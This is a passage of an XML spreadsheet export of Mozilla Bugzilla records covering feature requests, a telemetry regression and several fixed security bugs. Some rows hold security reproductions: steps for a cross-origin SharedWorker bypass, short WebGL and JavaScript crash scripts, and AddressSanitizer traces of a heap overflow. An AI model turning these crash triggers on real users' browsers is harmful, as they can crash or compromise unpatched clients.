      <c r="K3442" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3442" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3442" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3442" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3442" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3442" t="inlineStr">
        <is>
          <t>[tx]</t>
        </is>
      </c>
      <c r="Q3442" t="inlineStr">
        <is>
          <t>P5</t>
        </is>
      </c>
      <c r="R3442" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3442" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3442" t="n">
        <v>1</v>
      </c>
      <c r="U3442" t="n">
        <v>0</v>
      </c>
      <c r="V3442" t="n">
        <v>3</v>
      </c>
      <c r="W3442" t="inlineStr">
        <is>
          <t>When we create a mirror, most often we want to enable the mirror right away.  Currently it's a two step process, create then enable.  I'd like a check box in the mirror create form (by default should probably be unchecked) which when checked, enables the mirror upon creation.</t>
        </is>
      </c>
      <c r="X3442" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3443">
      <c r="A3443" t="n">
        <v>1419166</v>
      </c>
      <c r="B3443" t="inlineStr">
        <is>
          <t>2017-11-20 13:40:08 -0800</t>
        </is>
      </c>
      <c r="C3443" t="inlineStr">
        <is>
          <t>Cross-origin Shared Worker using data: url</t>
        </is>
      </c>
      <c r="D3443" t="inlineStr">
        <is>
          <t>2024-05-30 09:38:42 -0700</t>
        </is>
      </c>
      <c r="E3443" t="n">
        <v>1</v>
      </c>
      <c r="F3443" t="n">
        <v>1</v>
      </c>
      <c r="G3443" t="n">
        <v>3</v>
      </c>
      <c r="H3443" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3443" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3443" t="inlineStr">
        <is>
          <t>DOM: Workers</t>
        </is>
      </c>
      <c r="K3443" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3443" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3443" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3443" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3443" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3443" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main59+] deadline: Chrome aiming to fix in M-64</t>
        </is>
      </c>
      <c r="Q3443" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3443" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3443" t="inlineStr">
        <is>
          <t>mozilla59</t>
        </is>
      </c>
      <c r="T3443" t="n">
        <v>1</v>
      </c>
      <c r="U3443" t="n">
        <v>0</v>
      </c>
      <c r="V3443" t="n">
        <v>37</v>
      </c>
      <c r="W3443" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
Steps to reproduce:
1. Go to http://test.shhnjk.com/2.html
2. Click on open another window button.
3. Click on stop button on one tab
Actual results:
Both tabs stopped counting (SharedWorker established cross-origin).
Expected results:
In https://html.spec.whatwg.org/multipage/workers.html#sharedworker, step 11.2's note of "When the SharedWorker(scriptURL, options) constructor is invoked:"  says
data: URLs create a worker with an opaque origin. Both the constructor origin and constructor url are compared so the same data: URL can be used within an origin to get to the same SharedWorkerGlobalScope object, but cannot be used to bypass the same origin restriction.
This is not the case in Firefox and cross-origin site can create SharedWorker using data URL SharedWorker script.</t>
        </is>
      </c>
      <c r="X3443" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3444">
      <c r="A3444" t="n">
        <v>1392280</v>
      </c>
      <c r="B3444" t="inlineStr">
        <is>
          <t>2017-08-21 07:59:00 -0700</t>
        </is>
      </c>
      <c r="C3444" t="inlineStr">
        <is>
          <t>Regression in FX_NEW_WINDOW_MS</t>
        </is>
      </c>
      <c r="D3444" t="inlineStr">
        <is>
          <t>2017-08-23 02:08:43 -0700</t>
        </is>
      </c>
      <c r="E3444" t="n">
        <v>1</v>
      </c>
      <c r="F3444" t="n">
        <v>1</v>
      </c>
      <c r="G3444" t="n">
        <v>2</v>
      </c>
      <c r="H3444" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3444" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3444" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3444" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3444" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3444" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3444" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3444" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3444" t="inlineStr">
        <is>
          <t>[photon-performance]</t>
        </is>
      </c>
      <c r="Q3444" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3444" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3444" t="inlineStr">
        <is>
          <t>Firefox 57</t>
        </is>
      </c>
      <c r="T3444" t="n">
        <v>1</v>
      </c>
      <c r="U3444" t="n">
        <v>0</v>
      </c>
      <c r="V3444" t="n">
        <v>14</v>
      </c>
      <c r="W3444" t="inlineStr">
        <is>
          <t>Telemetry shows a regression in the time it takes to open a new tab since Friday:
https://mzl.la/2vXkYFv
The regression is significant (takes us back to early-55 days) so we should figure out what caused it.</t>
        </is>
      </c>
      <c r="X3444" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3445">
      <c r="A3445" t="n">
        <v>601686</v>
      </c>
      <c r="B3445" t="inlineStr">
        <is>
          <t>2010-10-04 12:04:28 -0700</t>
        </is>
      </c>
      <c r="C3445" t="inlineStr">
        <is>
          <t>Showfor helper for wiki editor</t>
        </is>
      </c>
      <c r="D3445" t="inlineStr">
        <is>
          <t>2010-10-14 12:49:02 -0700</t>
        </is>
      </c>
      <c r="E3445" t="n">
        <v>1</v>
      </c>
      <c r="F3445" t="n">
        <v>1</v>
      </c>
      <c r="G3445" t="n">
        <v>5</v>
      </c>
      <c r="H3445" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3445" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J3445" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K3445" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3445" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3445" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3445" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3445" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3445" t="inlineStr"/>
      <c r="Q3445" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3445" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3445" t="inlineStr">
        <is>
          <t>2.3</t>
        </is>
      </c>
      <c r="T3445" t="n">
        <v>1</v>
      </c>
      <c r="U3445" t="n">
        <v>0</v>
      </c>
      <c r="V3445" t="n">
        <v>3</v>
      </c>
      <c r="W3445" t="inlineStr">
        <is>
          <t>It's a modal with checkboxes to help select `for` options.
http://people.mozilla.com/~chowse/drop/sumo/kb/v7/contributing/02_editing.png</t>
        </is>
      </c>
      <c r="X3445" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3446">
      <c r="A3446" t="n">
        <v>785734</v>
      </c>
      <c r="B3446" t="inlineStr">
        <is>
          <t>2012-08-26 11:23:58 -0700</t>
        </is>
      </c>
      <c r="C3446" t="inlineStr">
        <is>
          <t>Mesa crashes on certain texImage2D calls involving level&gt;0</t>
        </is>
      </c>
      <c r="D3446" t="inlineStr">
        <is>
          <t>2024-05-30 07:32:37 -0700</t>
        </is>
      </c>
      <c r="E3446" t="n">
        <v>1</v>
      </c>
      <c r="F3446" t="n">
        <v>1</v>
      </c>
      <c r="G3446" t="n">
        <v>3</v>
      </c>
      <c r="H3446" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3446" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3446" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K3446" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3446" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3446" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3446" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3446" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3446" t="inlineStr">
        <is>
          <t>[asan][adv-track-main17+][adv-track-esr17+][qa-] webgl-test-needed</t>
        </is>
      </c>
      <c r="Q3446" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3446" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3446" t="inlineStr">
        <is>
          <t>mozilla19</t>
        </is>
      </c>
      <c r="T3446" t="n">
        <v>1</v>
      </c>
      <c r="U3446" t="n">
        <v>0</v>
      </c>
      <c r="V3446" t="n">
        <v>62</v>
      </c>
      <c r="W3446" t="inlineStr">
        <is>
          <t>Created attachment 655441
repro
&lt;html&gt;
  &lt;head&gt;
    &lt;script&gt;
      var gl = document.createElement('canvas').getContext('experimental-webgl')
      var texture = gl.createTexture()
      gl.bindTexture(gl.TEXTURE_2D, texture)
      gl.texImage2D(gl.TEXTURE_2D, 6, gl.RGBA, 512, 2, 0, gl.RGBA, gl.UNSIGNED_BYTE, null)
      gl.deleteTexture(texture)
    &lt;/script&gt;
  &lt;/head&gt;
&lt;/html&gt;
crashes on linux with mesa like:
==32234== ERROR: AddressSanitizer crashed on unknown address 0x000100000011 (pc 0x7fffc5321690 sp 0x7fffffff4988 bp 0x000000000006 T0)
AddressSanitizer can not provide additional info. ABORTING
    #0 0x7fffc5321690 in ?? ??:0
also crashes chrome</t>
        </is>
      </c>
      <c r="X3446" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3447">
      <c r="A3447" t="n">
        <v>505988</v>
      </c>
      <c r="B3447" t="inlineStr">
        <is>
          <t>2009-07-23 06:44:08 -0700</t>
        </is>
      </c>
      <c r="C3447" t="inlineStr">
        <is>
          <t>It's possible to access a double-wrapped object's underlying privileged object</t>
        </is>
      </c>
      <c r="D3447" t="inlineStr">
        <is>
          <t>2009-12-15 10:58:57 -0800</t>
        </is>
      </c>
      <c r="E3447" t="n">
        <v>1</v>
      </c>
      <c r="F3447" t="n">
        <v>1</v>
      </c>
      <c r="G3447" t="n">
        <v>3</v>
      </c>
      <c r="H3447" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3447" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3447" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K3447" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3447" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3447" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N3447" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3447" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3447" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q3447" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3447" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3447" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3447" t="n">
        <v>1</v>
      </c>
      <c r="U3447" t="n">
        <v>0</v>
      </c>
      <c r="V3447" t="n">
        <v>25</v>
      </c>
      <c r="W3447" t="inlineStr">
        <is>
          <t>XPCVariant::VariantDataToJS() unwraps double-wrapped objects even when it
shouldn't.</t>
        </is>
      </c>
      <c r="X3447" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3448">
      <c r="A3448" t="n">
        <v>826804</v>
      </c>
      <c r="B3448" t="inlineStr">
        <is>
          <t>2013-01-04 11:42:03 -0800</t>
        </is>
      </c>
      <c r="C3448" t="inlineStr">
        <is>
          <t>[Google Analytics] Track "ShowFor" switcher usage in Google Analytics</t>
        </is>
      </c>
      <c r="D3448" t="inlineStr">
        <is>
          <t>2013-02-07 18:01:21 -0800</t>
        </is>
      </c>
      <c r="E3448" t="n">
        <v>1</v>
      </c>
      <c r="F3448" t="n">
        <v>1</v>
      </c>
      <c r="G3448" t="n">
        <v>5</v>
      </c>
      <c r="H3448" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3448" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J3448" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3448" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3448" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3448" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3448" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3448" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3448" t="inlineStr">
        <is>
          <t>u=sumo-team c=analytics p=2 s=2013.2</t>
        </is>
      </c>
      <c r="Q3448" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3448" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3448" t="inlineStr">
        <is>
          <t>2013Q1</t>
        </is>
      </c>
      <c r="T3448" t="n">
        <v>1</v>
      </c>
      <c r="U3448" t="n">
        <v>0</v>
      </c>
      <c r="V3448" t="n">
        <v>21</v>
      </c>
      <c r="W3448" t="inlineStr">
        <is>
          <t>We want to track how often the user agent switcher is used in the Support site.
The easiest way of doing this is by generating events anytime somebody uses one or the other.
My recommendation is to execute the following events when a user changes the OS or the Firefox version.
For the OS dropdown:
_gaq.push(['_trackEvent', 'UA Switch', 'OS', $article_slug]);
For the Fx version dropdown:
_gaq.push(['_trackEvent', 'UA Switch', 'Fx Version', $article_slug]);
More detailed documentation about GA events can be found here: https://developers.google.com/analytics/devguides/collection/gajs/eventTrackerGuide</t>
        </is>
      </c>
      <c r="X3448" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3449">
      <c r="A3449" t="n">
        <v>1742382</v>
      </c>
      <c r="B3449" t="inlineStr">
        <is>
          <t>2021-11-22 04:27:31 -0800</t>
        </is>
      </c>
      <c r="C3449" t="inlineStr">
        <is>
          <t>heap-buffer-overflow in blendGaussianBlur</t>
        </is>
      </c>
      <c r="D3449" t="inlineStr">
        <is>
          <t>2024-05-30 10:51:21 -0700</t>
        </is>
      </c>
      <c r="E3449" t="n">
        <v>1</v>
      </c>
      <c r="F3449" t="n">
        <v>1</v>
      </c>
      <c r="G3449" t="n">
        <v>3</v>
      </c>
      <c r="H3449" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3449" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3449" t="inlineStr">
        <is>
          <t>Graphics: WebRender</t>
        </is>
      </c>
      <c r="K3449" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3449" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3449" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3449" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3449" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3449" t="inlineStr">
        <is>
          <t>[sec-survey][adv-main96+][adv-ESR91.5+]</t>
        </is>
      </c>
      <c r="Q3449" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3449" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S3449" t="inlineStr">
        <is>
          <t>97 Branch</t>
        </is>
      </c>
      <c r="T3449" t="n">
        <v>1</v>
      </c>
      <c r="U3449" t="n">
        <v>0</v>
      </c>
      <c r="V3449" t="n">
        <v>29</v>
      </c>
      <c r="W3449" t="inlineStr">
        <is>
          <t>Created attachment 9251887
heap-buffer-overflow-blendGaussianBlur.html
Tested on:
  OS: Ubuntu 20.04
  Firefox version: $ fuzzfetch --target firefox --os Linux --asan --fuzzing -n firefox
```
          [2021-11-22 14:04:37] &gt; Task ID: Lkjj4P35Rde9LyC3IRKhUQ
          [2021-11-22 14:04:37] &gt; Rank: 1637573952
          [2021-11-22 14:04:37] &gt; Changeset: ace2f4af2c29de1886e1e627d0fdb583e7573b59
          [2021-11-22 14:04:37] &gt; Build ID: 20211122093912
          [2021-11-22 14:04:37] &gt; Downloading: https://firefox-ci-tc.services.mozilla.com/api/queue/v1/task/Lkjj4P35Rde9LyC3IRKhUQ/artifacts/public/build/target.tar.bz2
```
Release Firefox 94.0 (64-bit) crashes with an MOZ_CRASH "called `Option::unwrap()` on a `None` value". Didn't set affected version since I didn't try with sanitizer build
Reported it as https://crash-stats.mozilla.org/report/index/c1a7a01e-4819-4b17-abe8-9c7ad0211122
Nightly Firefox crash report: https://crash-stats.mozilla.org/report/index/8913e93c-8f06-48c9-b46e-9f21e0211122
Repro-file as an attachment. If the issue doesn't reproduce, try increasing the number of insertions for the HTML chunk. For my laptop, 800 was enough to start crashing reliably, so I set it to 1000 for the repro-file.
```
47:  var count = 1000;
```
AddressSanitizer trace:
```
ATTENTION: default value of option mesa_glthread overridden by environment.
=================================================================
==1855133==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f887c952807 at pc 0x7f8920093b27 bp 0x7f88f7363c40 sp 0x7f88f7363c38
READ of size 16 at 0x7f887c952807 thread T13 (Renderer)
    #0 0x7f8920093b26 in load&lt;unsigned int&gt; /builds/worker/checkouts/gecko/gfx/wr/swgl/src/vector_type.h:503:5
    #1 0x7f8920093b26 in unaligned_load&lt;unsigned int __attribute__((ext_vector_type(4))), unsigned int&gt; /builds/worker/checkouts/gecko/gfx/wr/swgl/src/vector_type.h:532:10
    #2 0x7f8920093b26 in unsigned short vector[(4) * (sizeof (unsigned int))] glsl::gaussianBlurVertical&lt;unsigned int, glsl::sampler2D_impl*&gt;(glsl::sampler2D_impl*, glsl::ivec2_scalar const&amp;, int, int, int, float, float) /builds/worker/checkouts/gecko/gfx/wr/swgl/src/texture.h:1110:24
    #3 0x7f892008533b in blendGaussianBlur&lt;false, glsl::sampler2D_impl *, unsigned int&gt; /builds/worker/checkouts/gecko/gfx/wr/swgl/src/swgl_ext.h:958:16
    #4 0x7f892008533b in cs_blur_COLOR_TARGET_frag::swgl_drawSpanRGBA8() /builds/worker/workspace/obj-build/x86_64-unknown-linux-gnu/release/build/swgl-7a39aed50e042c2c/out/cs_blur_COLOR_TARGET.h:635:2
    #5 0x7f892007fd19 in cs_blur_COLOR_TARGET_frag::draw_span_RGBA8(cs_blur_COLOR_TARGET_frag*) /builds/worker/workspace/obj-build/x86_64-unknown-linux-gnu/release/build/swgl-7a39aed50e042c2c/out/cs_blur_COLOR_TARGET.h:678:42
    #6 0x7f892018de16 in draw_span /builds/worker/checkouts/gecko/gfx/wr/swgl/src/program.h:168:12
    #7 0x7f892018de16 in void draw_quad_spans&lt;unsigned int&gt;(int, glsl::vec2_scalar*, unsigned int, glsl::vec3*, Texture&amp;, Texture&amp;, ClipRect const&amp;) /builds/worker/checkouts/gecko/gfx/wr/swgl/src/rasterize.h:1028:42
    #8 0x7f891fc7c57e in draw_quad(int, Texture&amp;, Texture&amp;) /builds/worker/checkouts/gecko/gfx/wr/swgl/src/rasterize.h:1615:5
    #9 0x7f891fc7a09c in void draw_elements&lt;unsigned short&gt;(int, int, unsigned long, VertexArray&amp;, Texture&amp;, Texture&amp;) /builds/worker/checkouts/gecko/gfx/wr/swgl/src/rasterize.h:1648:7
    #10 0x7f891fc79cd9 in DrawElementsInstanced /builds/worker/checkouts/gecko/gfx/wr/swgl/src/gl.cc:2734:7
    #11 0x7f891f7b69a0 in webrender::device::gl::Device::draw_indexed_triangles_instanced_u16::hf874f8a08646d2b7 /builds/worker/checkouts/gecko/gfx/wr/webrender/src/device/gl.rs:3639:9
    #12 0x7f891f7b69a0 in webrender::renderer::Renderer::draw_instanced_batch::ha606111b3f9e79d9 /builds/worker/checkouts/gecko/gfx/wr/webrender/src/renderer/mod.rs:2496:17
...
    #34 0x7f892dc52292 in clone /build/glibc-eX1tMB/glibc-2.31/misc/../sysdeps/unix/sysv/linux/x86_64/clone.S:95
0x7f887c952807 is located 7 bytes to the right of 16777216-byte region [0x7f887b952800,0x7f887c952800)
allocated by thread T13 (Renderer) here:
    #0 0x55e3f8fba683 in realloc /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:148:3
    #1 0x7f891fc800a1 in Texture::allocate(bool, int, int) /builds/worker/checkouts/gecko/gfx/wr/swgl/src/gl.cc:505:32
    #2 0x7f891fc65dcf in set_tex_storage(Texture&amp;, unsigned int, int, int, void*, int, int, int) /builds/worker/checkouts/gecko/gfx/wr/swgl/src/gl.cc:1708:10
    #3 0x7f891fc6588e in TexStorage2D /builds/worker/checkouts/gecko/gfx/wr/swgl/src/gl.cc:1724:3
    #4 0x7f891fc66b69 in TexImage2D /builds/worker/checkouts/gecko/gfx/wr/swgl/src/gl.cc:1812:3
    #5 0x7f891fc49a9f in _$LT$swgl..swgl_fns..Context$u20$as$u20$gleam..gl..Gl$GT$::tex_image_2d::h40885d72a076c3fe /builds/worker/checkouts/gecko/gfx/wr/swgl/src/swgl_fns.rs:995:13
    #6 0x7f891f578213 in webrender::device::gl::Device::create_texture::h309962d0f1ae9501 /builds/worker/checkouts/gecko/gfx/wr/webrender/src/device/gl.rs:2535:13
    #7 0x7f891f78c743 in webrender::renderer::Renderer::update_texture_cache::_$u7b$$u7b$closure$u7d$$u7d$::h37693bd23f49b62b /builds/worker/checkouts/gecko/gfx/wr/webrender/src/renderer/mod.rs:2364:29
    #8 0x7f891f78c743 in core::option::Option$LT$T$GT$::unwrap_or_else::h846cfa865feb4642 /builds/worker/fetches/rust/library/core/src/option.rs:776:21
...
    #26 0x7f892cf8409e in _pt_root /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:201:5
    #27 0x7f892e08a608 in start_thread /build/glibc-eX1tMB/glibc-2.31/nptl/pthread_create.c:477:8
Thread T13 (Renderer) created by T0 (GeckoMain) here:
    #0 0x55e3f8fa4a8c in pthread_create /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cpp:207:3
    #1 0x7f892cf74124 in _PR_CreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:458:14
    #2 0x7f892cf653ce in PR_CreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:533:12
    #3 0x7f890f8436d5 in nsThread::Init(nsTSubstring&lt;char&gt; const&amp;) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:615:18
    #4 0x7f890f85091f in nsThreadManager::NewNamedThread(nsTSubstring&lt;char&gt; const&amp;, unsigned int, nsIThread**) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadManager.cpp:581:12
    #5 0x7f890f85bae1 in NS_NewNamedThread(nsTSubstring&lt;char&gt; const&amp;, nsIThread**, already_AddRefed&lt;nsIRunnable&gt;, unsigned int) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:163:57
    #6 0x7f89129416d1 in NS_NewNamedThread&lt;9UL&gt; /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:74:10
    #7 0x7f89129416d1 in mozilla::wr::RenderThread::Start() /builds/worker/checkouts/gecko/gfx/webrender_bindings/RenderThread.cpp:92:17
    #8 0x7f89126e1b0e in InitLayersIPC /builds/worker/checkouts/gecko/gfx/thebes/gfxPlatform.cpp:1291:7
...
    #50 0x55e3f8fef6d9 in main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:395:16
    #51 0x7f892db570b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
SUMMARY: AddressSanitizer: heap-buffer-overflow /builds/worker/checkouts/gecko/gfx/wr/swgl/src/vector_type.h:503:5 in load&lt;unsigned int&gt;
...
==1855133==ABORTING
Exiting due to channel error.
Exiting due to channel error.
Exiting due to channel error.
Exiting due to channel error.
```</t>
        </is>
      </c>
      <c r="X3449" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3450">
      <c r="A3450" t="n">
        <v>514999</v>
      </c>
      <c r="B3450" t="inlineStr">
        <is>
          <t>2009-09-06 23:04:02 -0700</t>
        </is>
      </c>
      <c r="C3450" t="inlineStr">
        <is>
          <t>TM: "Assertion failure: thing, at ../jsgc.cpp"</t>
        </is>
      </c>
      <c r="D3450" t="inlineStr">
        <is>
          <t>2010-01-25 00:06:56 -0800</t>
        </is>
      </c>
      <c r="E3450" t="n">
        <v>1</v>
      </c>
      <c r="F3450" t="n">
        <v>1</v>
      </c>
      <c r="G3450" t="n">
        <v>3</v>
      </c>
      <c r="H3450" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3450" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3450" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3450" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3450" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3450" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3450" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3450" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3450" t="inlineStr">
        <is>
          <t>fixed-in-tracemonkey [sg:critical]</t>
        </is>
      </c>
      <c r="Q3450" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3450" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3450" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3450" t="n">
        <v>1</v>
      </c>
      <c r="U3450" t="n">
        <v>0</v>
      </c>
      <c r="V3450" t="n">
        <v>37</v>
      </c>
      <c r="W3450" t="inlineStr">
        <is>
          <t>(function () {
    (eval("\
        (function () {\
            for (var y = 0; y &lt; 16; ++y) {\
                if (y % 3 == 2) {\
                    gczeal(1);\
                } else {\
                    print(0 / 0);\
                }\
            }\
        });\
    "))()
})();
asserts js debug shell with -j at Assertion failure: thing, at ../jsgc.cpp:2610
Brendan says (and I confirmed) that this is most probably related to bug 513981. Security-sensitive since bug 513981 is locked too.</t>
        </is>
      </c>
      <c r="X3450" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3451">
      <c r="A3451" t="n">
        <v>184358</v>
      </c>
      <c r="B3451" t="inlineStr">
        <is>
          <t>2002-12-08 22:11:28 -0800</t>
        </is>
      </c>
      <c r="C3451" t="inlineStr">
        <is>
          <t>Trunk M130A topcrash [@ nsHttpConnection::OnStopRequest] [@ nsHttpConnection::OnStartRequest][@ necko.dll | NECKO.DLL]</t>
        </is>
      </c>
      <c r="D3451" t="inlineStr">
        <is>
          <t>2011-06-09 14:58:36 -0700</t>
        </is>
      </c>
      <c r="E3451" t="n">
        <v>1</v>
      </c>
      <c r="F3451" t="n">
        <v>1</v>
      </c>
      <c r="G3451" t="n">
        <v>3</v>
      </c>
      <c r="H3451" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3451" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3451" t="inlineStr">
        <is>
          <t>Networking: HTTP</t>
        </is>
      </c>
      <c r="K3451" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3451" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3451" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3451" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3451" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3451" t="inlineStr"/>
      <c r="Q3451" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3451" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
